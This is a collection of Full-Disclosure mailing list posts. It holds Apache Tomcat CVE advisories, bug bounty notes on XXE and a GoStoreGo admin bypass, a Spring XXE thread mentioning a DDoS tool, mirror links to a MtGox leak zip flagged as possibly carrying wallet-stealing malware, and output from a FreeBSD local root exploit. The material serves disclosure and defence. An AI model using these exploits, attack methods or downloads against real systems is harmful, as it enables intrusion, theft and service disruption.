Re: [Full-disclosure] OT What is happening with bitcoins?
Be careful about those zip files. I haven't looked, but they may contain the tibannebackoffice.exe wallet stealing malware. It has appeared in other MtGox2014Leak.zip files. http://www.reddit.com/r/Bitcoin/comments/200k30/the_tibannebackofficeexe_executable_is_wallet/ Mark M. Jaycox | 415.436.9333x128 Electronic Frontier Foundation | Become a Member! eff.org/r.a9hS On 3/10/14 12:54 AM, coderman wrote: On Thu, Mar 6, 2014 at 4:09 PM, Pedro Worcel pe...@worcel.com wrote: Bitcoins are doing great actually. =) Used to be worth 0 a few years back, useless, and now you can use them to buy some stuff. also providing some awesome information for future uses, c.f.: http://blog.magicaltux.net/wp-content/uploads/2014/03/MtGox2014Leak.zip http://89.248.171.30/MtGox2014Leak.zip https://mega.co.nz/#!0VliDQBA!4Ontdi2MsLD4J5dV1-sr7pAgEYTSMi8rNeEMBikEhAs http://burnbit.com/download/280433/MtGox2014Leak_zip let me know if you're still short a mirror... ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] CVE-2014-0033 Session fixation still possible with disableURLRewriting enabled
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 CVE-2014-0033 Session fixation still possible with disableURLRewriting enabled Severity: Low Vendor: The Apache Software Foundation Versions Affected: - - Apache Tomcat 6.0.33 to 6.0.37 Description: Previous fixes to path parameter handling [1] introduced a regression that meant session IDs provided in the URL were considered even when disableURLRewriting was configured to true. Note that the session is only used for that single request. Mitigation: Users of affected versions should apply one of the following mitigations - - Upgrade to Apache Tomcat 6.0.39 or later (6.0.38 contains the fix but was not released) Credit: This issue was identified by the Apache Tomcat security team. References: [1] http://svn.apache.org/viewvc?view=revisionrevision=r1149220 [2] http://tomcat.apache.org/security-6.html -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (MingW32) Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/ iQIcBAEBAgAGBQJTDHw3AAoJEBDAHFovYFnnNM8QAJZRox6JZVDSygO8ddp3S9Gp FADhlqFpusDGkhO/4x+5UNaZ6nci2CVHYbVftsvxyZrsEZbmJk2rcQIcwwRtwtgj ZTG7Vt2v5Z+PqAeFSI+7rXsaumqD+itV2M/S9o4sPjsNSHoJ4+a00S8cYs8XBG5Q bnibxMGHbJi/ew037CTxvlZhPTM2Fir1YDwfagbNJvTbU379fg+NjZXJRa7AzWLW 46mFtRh7/PlYV9GP2rfy+l603Zgz/u9oiBAuXWkBqccUbSsgmauFJTk5jMnwF+By PHCsbe/ptkxEqlIkUYKBv4LPlJB5rjrvTcknrwXrx6WE79pdi37rd20nwuoIuCj5 kkZkrGIKUp029BGgGe+vVnJjjWcGuCsieyDMzvU/quNE9MX5oK5SEB+20QpZvQ6v PuAtv+h8DSvwYKlmGBoepztjXLUCfptlHu/txw4mYJhWTttaoA3mDkYoQNLpd90O N0lZJ04OTGDpRUiUNM1//Rq+MPaN5nwM4TNQiSY7c6su8C/ol3XYBCoBIYZPgxXk DbgD7B5ubOl/HDVzkpJifgbvX9EcrseZq62UV2Gh1ngw6QEY+XANCFE+7xX4/glt h6F3/9AEPuppeohboG0tuR6B0BDF5lj8gEUAHl4YdAgR6uem34QULxDMMnu7ULif 7gsVJdXCzt8BS5Znvhsp =HGNG -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] CVE-2013-4322 Incomplete fix for CVE-2012-3544 (Denial of Service)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 CVE-2013-4322 Incomplete fix for CVE-2012-3544 (Denial of Service) Severity: Important Vendor: The Apache Software Foundation Versions Affected: - - Apache Tomcat 8.0.0-RC1 to 8.0.0-RC5 - - Apache Tomcat 7.0.0 to 7.0.47 - - Apache Tomcat 6.0.0 to 6.0.37 Description: The fix for CVE-2012-3544 was not complete. It did not cover the following cases: a) Chunk extensions were not limited b) Whitespace after the : in a trailing header was not limited Mitigation: Users of affected versions should apply one of the following mitigations - - Upgrade to Apache Tomcat 8.0.0-RC10 or later (8.0.0-RC6 to 8.0.0-RC9 contain the fix but were not released) - - Upgrade to Apache Tomcat 7.0.50 or later (7.0.48 to 7.0.49 contain the fix but were not released) - - Upgrade to Apache Tomcat 6.0.39 or later (6.0.38 contains the fix but was not released) Credit: This issue was partly identified by the Apache Tomcat security team and party by Saran Neti of TELUS Security Labs. References: [1] http://tomcat.apache.org/security-8.html [2] http://tomcat.apache.org/security-7.html [3] http://tomcat.apache.org/security-6.html -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (MingW32) Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/ iQIcBAEBAgAGBQJTDHxCAAoJEBDAHFovYFnnAtcP/0U8NgjCuhFBps1tAIqAa+ty nLMYz3rgxHcY9ClWrJEBgGiIGb2wDQfylNsWR67PF/ue6yhLf+Bu5xs858Thr8V1 98ODkrQemNc9dcIdLJaRcSo05vzNCEN3v4vR9cpPpQpW8TB9y8L1HXmZEiGkM7ZD nwa6E6GDJizkwR+3Qs11r3tAxNAHPn611EYajYLf7+4vPLqgV4GOx2/D7ol/wTm0 3BM15VZjTtlHqrtghUOdXYEzoXwR9BKMVoMtED3e++5i0vCuvvLToxTJ6jI/QjjE UNm/hrfZK5ro3d+rzjOboLXIooAksK3A5UXxlvRi26ZgP3Nd0y8dN925WWfg2jXX V1saa+42vpI6g4NcINIbFnBqfPdM/xKSIuyyXDmmTF2rUHQftcToLikzmSDZlm4c edTyL+A4FcbEq8uymXwE/iA9KKa3PDcZheUw07YALp9JhFI6rfQT472cUavfNcGy h0nxkHg2hU4yUBPm2PSyoTAokkjhDgRvGgX0hA3ljSi0SpHyTwPfoUIwUb+Emgmb Vk00OJRJGtZs/GAL0TCd+LW96664Tx9oAqvgcLA3dZwLk94ivD5SC3Rl9xlyd4lF cgLCOvzwxHcAh7syNd8orWjmyZsJ1vVqGoL1waK1hl1AQNxoJRfDixSlNjchpBxO tCLvVC7UbgC0PFda+7kL =Hzxr -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] CVE-2013-4286 Incomplete fix for CVE-2005-2090 (Information disclosure)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 CVE-2013-4286 Incomplete fix for CVE-2005-2090 (Information disclosure) Severity: Important Vendor: The Apache Software Foundation Versions Affected: - - Apache Tomcat 8.0.0-RC1 - - Apache Tomcat 7.0.0 to 7.0.42 - - Apache Tomcat 6.0.0 to 6.0.37 Description: The fix for CVE-2005-2090 was not complete. It did not cover the following cases: - - content-length header with chunked encoding over any HTTP connector - - multiple content-length headers over any AJP connector Requests with multiple content-length headers or with a content-length header when chunked encoding is being used should be rejected as invalid. When multiple components (firewalls, caches, proxies and Tomcat) process a sequence of requests where one or more requests contain either multiple content-length headers or a content-length header when chunked encoding is being used and several components do not reject the request and make different decisions as to which content-length header to use an attacker can poison a web-cache, perform an XSS attack and obtain sensitive information from requests other then their own. Tomcat now rejects requests with multiple content-length headers or with a content-length header when chunked encoding is being used. Mitigation: Users of affected versions should apply one of the following mitigations - - Upgrade to Apache Tomcat 8.0.0-RC3 or later (8.0.0-RC2 contains the fix but was not released) - - Upgrade to Apache Tomcat 7.0.47 or later (7.0.43 to 7.0.46 contain the fix but were not released) - - Upgrade to Apache Tomcat 6.0.39 or later (6.0.38 contains the fix but was not released) Credit: This issue was identified by the Apache Tomcat security team while investigating an invalid report related to CVE-2005-2090. References: [1] http://tomcat.apache.org/security-8.html [2] http://tomcat.apache.org/security-7.html [3] http://tomcat.apache.org/security-6.html -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (MingW32) Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/ iQIcBAEBAgAGBQJTDHw/AAoJEBDAHFovYFnn8HgP/107ixjTiS7es6ka2fXl01Ag A2GUdevvgKXrbgtY6nVS1Sx65GZcG1k5Knpn6Cwg31dtipnEJmuk4+ScVlA43Jjy 8UpQbI0zm0oCgIRV6lRuYGn1kz5p7cSEF+s36QOAMym3qKNJ3YZn+pALVLgmF+D8 k7Yqe3Fwih68sJm3GRStZ9zlt5s7NNfHzSfnIe4wSyleA8xyK98Xa/8tlr3p0usK J7V5Dz1VSmi8TRpzXUVl8cWjQrD+tCZOWrrBgkWs2oj/TXiVZfiAA5Cv7p1F7HoJ ElF7dny5PJIFdAK3TU5WAkXRQJk2yp0FNv0YRSJGx4OLsiv+IrIXpVR4K12Hmc0n T4RzqyhfB7VGtxrLC/PpC6hoqd+LkuT6uJJA8lcfc+F51UWSHtOV5iW0h2kC6olu s/SKsljDOzx5L2nMdFGqs49cV4uIC8CFC8yP84EJO1gyRqyABxw3LwzUZvdMJ1Sl 29QM3vpMc3EypKXEZWe28Wbr7cZLK2oJt7pSF1DoPF/8DStYYhqztooKCyXAhjum 6Juf3C+w3HvaoR2YyIu5ZhbcGqkt0GHL+ZfvyPVcIFv+TeSYejmus0zdvQGWmnep Fgsdlbz2dUg7ncvmj7LYwCv4U6yj2oYUgMaVrocNVB8bSg0qMnfByg0tc4h8XzDv kNN3kqRWjmDaE37ZHywC =YF3X -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] CVE-2013-4590 Information disclosure via XXE when running untrusted web applications
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 CVE-2013-4590 Information disclosure via XXE when running untrusted web applications Severity: Low Vendor: The Apache Software Foundation Versions Affected: - - Apache Tomcat 8.0.0-RC1 to 8.0.0-RC5 - - Apache Tomcat 7.0.0 to 7.0.47 - - Apache Tomcat 6.0.0 to 6.0.37 Description: Application provided XML files such as web.xml, context.xml, *.tld, *.tagx and *.jspx allowed XXE which could be used to expose Tomcat internals to an attacker. This vulnerability only occurs when Tomcat is running web applications from untrusted sources such as in a shared hosting environment. Mitigation: Users of affected versions should apply one of the following mitigations - - Upgrade to Apache Tomcat 8.0.0-RC10 or later (8.0.0-RC6 to 8.0.0-RC9 contain the fix but were not released) - - Upgrade to Apache Tomcat 7.0.50 or later (7.0.48 to 7.0.49 contain the fix but were not released) - - Upgrade to Apache Tomcat 6.0.39 or later (6.0.38 contains the fix but was not released) Credit: This issue was identified by the Apache Tomcat security team. References: [1] http://tomcat.apache.org/security-8.html [2] http://tomcat.apache.org/security-7.html [3] http://tomcat.apache.org/security-6.html -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (MingW32) Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/ iQIcBAEBAgAGBQJTDHxJAAoJEBDAHFovYFnnyWAQAIoducHGYKhqCCq7SbbkeUxC 2y8HxdYKo0T/AfolZoTlFInPnVDG8cvoPjEKO7MVzmWJaXjH4lOPYWAzss/N5//M SCczevb1CSmw+m6d6TWs5YeJSGdJdEZuGjIo4GBTLYymUGPB88JdbeeIDvsVeWIx agPaXN80aNady+uPbbpPh3mLIRchi00Ui7vI+0eWMVzcOED1MsvNiPyaGk7eHIhQ nAoiG1QqY68yps1i9lTL1y5jaTklhf6Rh0BKRHA5oLBC2XH6vzKfVw4DVbYTDIve N74s4BssSCMgKDzIGG1zwvU6EdLrHW+NVmfKDey+D0j6THT3rTPiQC4QVjZfVY0u YLuLkX/kobjV2ESgXj7EBTzxuOB/F+bweZ4PfdSV723ggQclwotzLQvEfKkcc4WY taYl4D33gL55QvCsKCCDYbCZklZxOyQ34mly70064tOEFE/nuSq5hIS887Jh0WW2 5pDweW2GZxjXMPAs3sFpmx2UW8VEepxYOhVla/9O+AseHePlyjihEekpB+83Gotk YAFCpCrkXLX9i2B/LW65DYJYUycW+s6j1kQzGyJmsF0ff45airKhrcHvBLtPGm4B dhY5hLhaQh//eJvJlNoAq2QfDEiPEqR5Ks91mhkp+4JBP1ubMyGbQo/Di0jShoJR dwR7dpwk2mIO/l6BnAv6 =hR9C -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Google XXE Vulnerability
Hi All, There was an XML external entity vulnerability within Googles Public data explorer. This was submitted to Google as part of their Bug Bounty Program. For the full write up with screen shots - http://www.securatary.com/vulnerabilities -- All the best Mark Litchfield http://www.securatary.com Twitter - http://twitter.com/securatary ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Shopify (Bug Bounty) - XML External Entity Vulnerability
Shopify suffered from an XXE attack within their online stores domain - *.myshopify.com They were extremely quick in confirming and fixing the issue (even though it was a Sunday). Full details with the usual screen shots can be found at http://www.securatary.com -- All the best Mark Litchfield http://www.securatary.com Twitter - http://twitter.com/securatary ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Ebay, Inc Bug Bounty - GoStoreGo Administrative Authentication Bypass to all online stores
This attack allowed for a cross store (so essentially unauthenticated, as we have not authenticated to our target store) privilege escalation attack creating an administrative user on any *.gostorego.com store. As indicated by their own website, there are over 200,000 active stores. This attack allows access to 200,000 x Customers x data = Y. Due to the nature of the attack, it would trivial to automate an attack that would give us an administrative account on each of these stores with a single GET request !! Or you could simply have a great shopping experience. Google search site:gostorego.com, find the items you want to purchase. Create you admin account (or use stealth mode so all attacks are logged as the Store Owner), change the price then buy it or simply give yourself some store credit. This vulnerability was reported to the eBay Enterprise Bug Bounty team on Sunday 9th February 2014. They and the Magento engineering team put out a fix for this issue extremely quickly. So pats on the back all around are deserved. I tested the issue and tried a few work arounds, but the fix holds good. So I want to say a big thanks to them. Full issue with screen shots can be found at http://www.securatary.com within the vulnerabilities section. All the best Mark Litchfield www.securatary.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] CVE-2014-0050 Apache Commons FileUpload and Apache Tomcat DoS
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 CVE-2014-0050 Apache Commons FileUpload and Apache Tomcat DoS Severity: Important Vendor: The Apache Software Foundation Versions Affected: - - Commons FileUpload 1.0 to 1.3 - - Apache Tomcat 8.0.0-RC1 to 8.0.1 - - Apache Tomcat 7.0.0 to 7.0.50 - - Apache Tomcat 6 and earlier are not affected Apache Tomcat 7 and Apache Tomcat 8 use a packaged renamed copy of Apache Commons FileUpload to implement the requirement of the Servlet 3.0 and later specifications to support the processing of mime-multipart requests. Tomcat 7 and 8 are therefore affected by this issue. While Tomcat 6 uses Commons FileUpload as part of the Manager application, access to that functionality is limited to authenticated administrators. Description: It is possible to craft a malformed Content-Type header for a multipart request that causes Apache Commons FileUpload to enter an infinite loop. A malicious user could, therefore, craft a malformed request that triggered a denial of service. This issue was reported responsibly to the Apache Software Foundation via JPCERT but an error in addressing an e-mail led to the unintended early disclosure of this issue[1]. Mitigation: Users of affected versions should apply one of the following mitigations - - Upgrade to Apache Commons FileUpload 1.3.1 or later once released - - Upgrade to Apache Tomcat 8.0.2 or later once released - - Upgrade to Apache Tomcat 7.0.51 or later once released - - Apply the appropriate patch - Commons FileUpload: http://svn.apache.org/r1565143 - Tomcat 8: http://svn.apache.org/r1565163 - Tomcat 7: http://svn.apache.org/r1565169 - - Limit the size of the Content-Type header to less than 4091 bytes Credit: This issue was reported to the Apache Software Foundation via JPCERT. References: [1] http://markmail.org/message/kpfl7ax4el2owb3o [2] http://tomcat.apache.org/security-8.html [3] http://tomcat.apache.org/security-7.html -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (MingW32) Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/ iQIcBAEBAgAGBQJS83P8AAoJEBDAHFovYFnnbOwP/0m80St7x63n6VCiR0aGuGLz /J004spHfbc+vtg2RumObBTX6mSfvPgO2R4FzE17Etg8QtWreoxb7kjnVXUwjdMX nb3Yt6IY1yBW1K+YcZRziOQXkRnnjnpC7Lh2o5eqpJ1S7wpXl5PBIXYSxMAsJCuv axFA0aq5cc17uDAH1z6DPk4149oZz2lHdlBUTTkCh/0PrvcIFxwpej75gUfyaV0y DGZLs3IpRYcJMS131q72DUt9wBsIqJN0mqUOq2svBS3mlXBcKDjy21b8QiEr8itK UqwsYUtOZP4nZ4u8j6euxF2fC/ivm/930OGOl9pn2SbkoHJKm/4rz2GYDA9jq07K XEDeGdTx3ZuDaTaBER8xquETRZ/Rb8dbBxQwzmo6doJNOjsMQFlR+1F+p56AhYd0 klbT6Q7i/Ic3BdRJkUpaYshhtXeAOnH+0u9j4kRXMgJbkMgOacopomFX6HoXr9/i RHGbwwSZViLooR88Yg0FU2230+9mJLXxaJ6usHrtq4dS9ElSV320OCyisNjMX5hi 5SFYMSy+z0nsK2O6yCzlukztoFhvaNecvy3I8w5EKytweyFlPzxXn6QpQjG+ffb5 ql7TZRrApiaewp4crzBcZSAjDzRNiQpcI2xTTN/H9u/yk8lrhOULi4pljKCudvmM eIWblFdpoPVl0iqvsXA9 =uzLf -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Ektron CMS TakeOver Part (2) - PaylPal-Forward.com demonstration
On 2/4/2014 2:51 PM, security curmudgeon wrote: : From: Mark Litchfield mark () securatary com : As previously stated, I would post an update for Ektron CMS bypassing : the security fix. : A full step by step with the usual screen shots can be found at - : http://www.securatary.com/vulnerabilities Uh... you expect people to login to your site with their Facebook or Twitter credentials, to access these advisories? Errr no ?? Use the other option ?? And if you don't want to register, don't bother !! ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Ektron CMS TakeOver Part (2) - PaylPal-Forward.com demonstration
On 2/4/2014 3:01 PM, security curmudgeon wrote: : : From: Mark Litchfield mark () securatary com : : : As previously stated, I would post an update for Ektron CMS bypassing : : the security fix. : : : A full step by step with the usual screen shots can be found at - : : http://www.securatary.com/vulnerabilities : : Uh... you expect people to login to your site with their Facebook or Twitter : credentials, to access these advisories? : : Errr no ?? Use the other option ?? And if you don't want to register, don't : bother !! Links from /vulnerabilities, directly from advisories off the Research page, and even Follow us on Twitter all drop back to a login page asking for authentication using either Facebook or Twitter. This is not the behavior of the site as of 48 hours ago. Let me check. Normal registration should also be available ? Infact I will remove the registration. The purpose of this whole registration in the first place was to allow for future postings I am going to make later this week that would only be available to registered users. Not necessarily vulnerabilities, but useful stuff for pentesting. Also all registered users would be given a 48 hours head start on any new vulnerabilities that I post in the future. All the best Mark Mark ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [SPAM] Re: Ektron CMS TakeOver Part (2) - PaylPal-Forward.com demonstration
On 2/4/2014 3:13 PM, security curmudgeon wrote: : This is not the behavior of the site as of 48 hours ago. : Let me check. Normal registration should also be available ? Infact I : will remove the registration. : : The purpose of this whole registration in the first place was to allow : for future postings I am going to make later this week that would only : be available to registered users. Not necessarily vulnerabilities, but : useful stuff for pentesting. Also all registered users would be given : a 48 hours head start on any new vulnerabilities that I post in the : future. Which is great, but I strongly recommend you allow a site-specific registration for such purposes. Giving up one of the two dominant social media accounts for it is excessive. Whilst you may be correct, Securatary is working toward the reason why it exists in the first place - Crowd Sourcing - http://www.securatary.com/PPPs/Pentester-Info. With this in mind, making user registration an easy and no hassle process was the reason to include these social log in features as an OPTION. Since March last year I have been trying to get investment to get it up and running but no such luck as of yet. Anyway, that is the reason for these log in options. Using these are at the users discretion so I see no need to pull them down and to be honest, its my website, I would not dream of telling you (strongly recommend) what to do with yours. Thanks Mark ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [SPAM] Re: Ektron CMS TakeOver Part (2) - PaylPal-Forward.com demonstration
On 2/4/2014 3:13 PM, security curmudgeon wrote: : This is not the behavior of the site as of 48 hours ago. : Let me check. Normal registration should also be available ? Infact I : will remove the registration. : : The purpose of this whole registration in the first place was to allow : for future postings I am going to make later this week that would only : be available to registered users. Not necessarily vulnerabilities, but : useful stuff for pentesting. Also all registered users would be given : a 48 hours head start on any new vulnerabilities that I post in the : future. Which is great, but I strongly recommend you allow a site-specific registration for such purposes. Giving up one of the two dominant social media accounts for it is excessive. I should add, I am all for constructive criticism. But a public forum is not really the place. Feel free to email me directly. Thanks ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Ektron CMS TakeOver Part (2) - PaylPal-Forward.com demonstration
As previously stated, I would post an update for Ektron CMS bypassing the security fix. A full step by step with the usual screen shots can be found at - http://www.securatary.com/vulnerabilities In this example, we use www.paypal-forward.com as a demonstration site. I would like to say that PayPal fixed this issue with their own workaround extremely quickly. Excellent work by their security / dev team. All the best Mark Litchfield www.securatary.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] XXE Injection in Spring Framework
On 04/11/2013 19:26, /-\\ndrew /\//ady wrote: Hi, Was Pivotal informed about these advisories and was there any collaboration from them? The current stable is 3.2.4 Yes, Pivotal was informed of these issues by Alvaro Munoz of the HP Enterprise Security Team who discovered them and reported them responsibly to the Pivotal Security Team. Yes, there was collaboration between Alvaro Munoz, the Pivotal Security Team and the Spring developers as we worked through which vectors were an application responsibility, which were a framework responsibility and how each each was going to be addressed. I'd have to go back and check my archive in detail to be certain but from memory the vectors that were an application responsibility already had a warning in the documentation and that warning was expanded. Some new utility classes were also provided to make it easier for users to do the right thing. For the vectors the framework was responsible for, entity expansion was disabled by default (it was enabled by default in some cases - hence the vulnerability). Where an option to control entity expansion didn't previously exist one was added so that applications that were processing XML from trusted sources and wanted / needed to enable entity expansion could do so. See also: http://www.gopivotal.com/security/cve-2013-4152 http://seclists.org/fulldisclosure/2013/Aug/233 HTH, Mark Pivotal Security Team Lead Thanks, A. On Saturday, November 02, 2013 07:04:59 AM MustLive wrote: Hello! I'll give you additional information concerning advisory XML External Entity (XXE) Injection in Spring Framework (http://securityvulns.ru/docs29758.html). - Affected products: - - 3.0.0 to 3.2.3 (Spring OXM Spring MVC) - 4.0.0.M1 (Spring OXM) - 4.0.0.M1-4.0.0.M2 (Spring MVC) - Earlier unsupported versions may also be affected - Affected vendors: - Spring by Pivotal. -- Details: -- The Spring OXM wrapper doesn't disable external entity resolution when using the JAXB unmarshaller (SAXSource and StreamSource instances are vulnerable). Also Spring MVC processes user provided XML with JAXB in combination with a StAX XMLInputFactory without disabling external entity resolution. Besides standard vectors of attacks with XXE Injection vulnerabilities (such as local file inclusion), which are usually mentioned in advisories, XXE Injection also allows to conduct attacks on other sites. And with using DAVOSET (DDoS attacks via other sites execution tool) it's possible to automate such attacks. I wrote about such attacks in my 2012's article Using XML External Entities (XXE) for attacks on other sites ( http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2012- August/008481.html) and 2013's Using XXE vulnerabilities for attacks on other sites ( http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2013- August/008887.html). As I described in my articles, XXE vulnerabilities can be used for conducting CSRF and DoS attacks on other sites (and at using multiple web sites it's possible to conduct DDoS attacks). And my tool DAVOSET can be used for conducting such attacks via XXE vulnerabilities. In October I released video demonstration of DAVOSET: http://www.youtube.com/watch?v=RKi35-f346I So all vulnerable web applications with affected versions of Spring Framework can be used for attacks on other sites via XXE Injection. Best wishes regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Happy Birthday FreeBSD! Now you are 20 years old and your security is the same as 20 years ago... :)
On Wed, 19 Jun 2013 16:32:59 -0500, Hunger hun...@hunger.hu wrote:
$ uname -a
FreeBSD fbsd91x64 9.1-RELEASE FreeBSD 9.1-RELEASE #0 r243825: Tue Dec
4 09:23:10 UTC 2012
r...@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC amd64
$ id
uid=1001(hunger) gid=1002(hunger) groups=1002(hunger)
$ gcc fbsd9lul.c -o fbsd9lul
$ ./fbsd9lul
FreeBSD 9.{0,1} mmap/ptrace exploit
by Hunger fbsd9...@hunger.hu
# id
uid=0(root) gid=0(wheel) egid=1002(hunger) groups=1002(hunger)
#
But does your exploit compile with clang?
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CVE-2013-2071 Request mix-up if AsyncListener method throws RuntimeException
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 CVE-2013-2071 Request mix-up if AsyncListener method throws RuntimeException Severity: Moderate Vendor: The Apache Software Foundation Versions Affected: - - Tomcat 7.0.0 to 7.0.39 Description: Bug 54178 described a scenario where elements of a previous request may be exposed to a current request. This was very difficult to exploit deliberately but fairly likely to happen unexpectedly if an application used AsyncListeners that threw RuntimeExceptions. The issue was fixed by catching the RuntimeExceptions. Mitigation: Users of affected versions should apply the following mitigation: - - Tomcat 7.0.x users should upgrade to 7.0.40 or later Credit: The security implications of this issue were identified by the Apache Tomcat Security Team. References: http://tomcat.apache.org/security.html http://tomcat.apache.org/security-7.html https://issues.apache.org/bugzilla/show_bug.cgi?id=54178 -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (MingW32) Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/ iQIcBAEBAgAGBQJRjLHMAAoJEBDAHFovYFnnOIAP/A9HXwQgnJKYl+gXwqFkjXaq blo70uMMUpKPJ61l/keEguxZ/iGdQC4H2osjQiG7lhoOPvrMKtewCMXDAk/j9Skd HXuQVSge22Na16M6GUNXARziyDk/44k8RHy3cibrPZPhUNVD743N50toPK8Q6UKR PmAANa/kB9vvD589PCQLx/i6oiS5jaAwjoSdbwshtJytXrxoHgUrRLl3P5/sPBiq 57H/pAELR4aorfSj+tJL63ySX9v4NRiB55u3hNDgZOnPz3D9sjMsmq5vSzhfyiHh NnkYGa7+ZfnBL6DJ4eiV5z7lbMFIBa7ZzcyYEhVFCIsbnSwTL2l0a3NSkuQ0xiXS 0jQDenOuCujL1Zw5YYHhRDy2rGbFG8q/Z+ZSQ3NP0vnmQCpCfsY3mBIFCWzhmK+h TnFKdtxA+Ev/HSGPlSK1hADiYwL/iLb6YMoyintgj2mDIxrdHhcfMq8h6GYD1rbF vlbWSpmgN81xdU8JxEbnq6PC60OeZH5x08Sj9B3YQlB8E4Pq9B/EaEFYF9oZdYcP +DQWcd78SBNevg+fgKdKK8CjU5JQhMWetxv6HUomS7j3LgoJQPwVrNcg0yjV1v/g qgddQ1DOamD+KuQxh08NHfMZP08g5a+CrQ6qpe3/pr/OI0PlTN23aCXvCEGl2KlZ Cn4w/1eoL4agb5oREL2U =vQbB -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] CVE-2013-2067 Session fixation with FORM authenticator
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 CVE-2013-2067 Session fixation with FORM authenticator Severity: Important Vendor: The Apache Software Foundation Versions Affected: - - Tomcat 7.0.0 to 7.0.32 - - Tomcat 6.0.21 to 6.0.36 Description: FORM authentication associates the most recent request requiring authentication with the current session. By repeatedly sending a request for an authenticated resource while the victim is completing the login form, an attacker could inject a request that would be executed using the victim's credentials. This attack has been prevented by changing the session ID prior to displaying the login page as well as after the user has successfully authenticated. Mitigation: Users of affected versions should apply one of the following mitigations: - - Tomcat 7.0.x users should upgrade to 7.0.33 or later - - Tomcat 6.0.x users should upgrade to 6.0.37 or later Credit: This issue was identified by the Apache Tomcat Security Team. References: http://tomcat.apache.org/security.html http://tomcat.apache.org/security-7.html http://tomcat.apache.org/security-6.html -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (MingW32) Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/ iQIcBAEBAgAGBQJRjLHUAAoJEBDAHFovYFnnUnEP/0R3q0uPTHRXem+Jlx6DLLfs jL3TD1idxqHcUDJhX/mnePwTxIle5lAbPZn6hBknFPdD77kjyflq4TB3ZPUipsip s2bKzGGlDDZwzRIY46ZqBRcVXuemCu73BjFNLBP6CvjQwm1/wFGuOS+oRRKKigwQ Ew1Mau3c6Sb0VIED4yrgvhPwJwdi1+rA1TO87p/8rxQIS9CTcUy6J/MICPdvIQiI zIfr7pIRSNDk9JeC6Ybr/SC5lYqAox6eqOYYNoQ+5zQ1BcCw/eQgWpm4WYM2IDV3 2eNbjS/dylz5zBQEDbzz9VtReBTncQLF6Do2KDhWxkaUaX2oaOTPKlLiyL0gwA4e 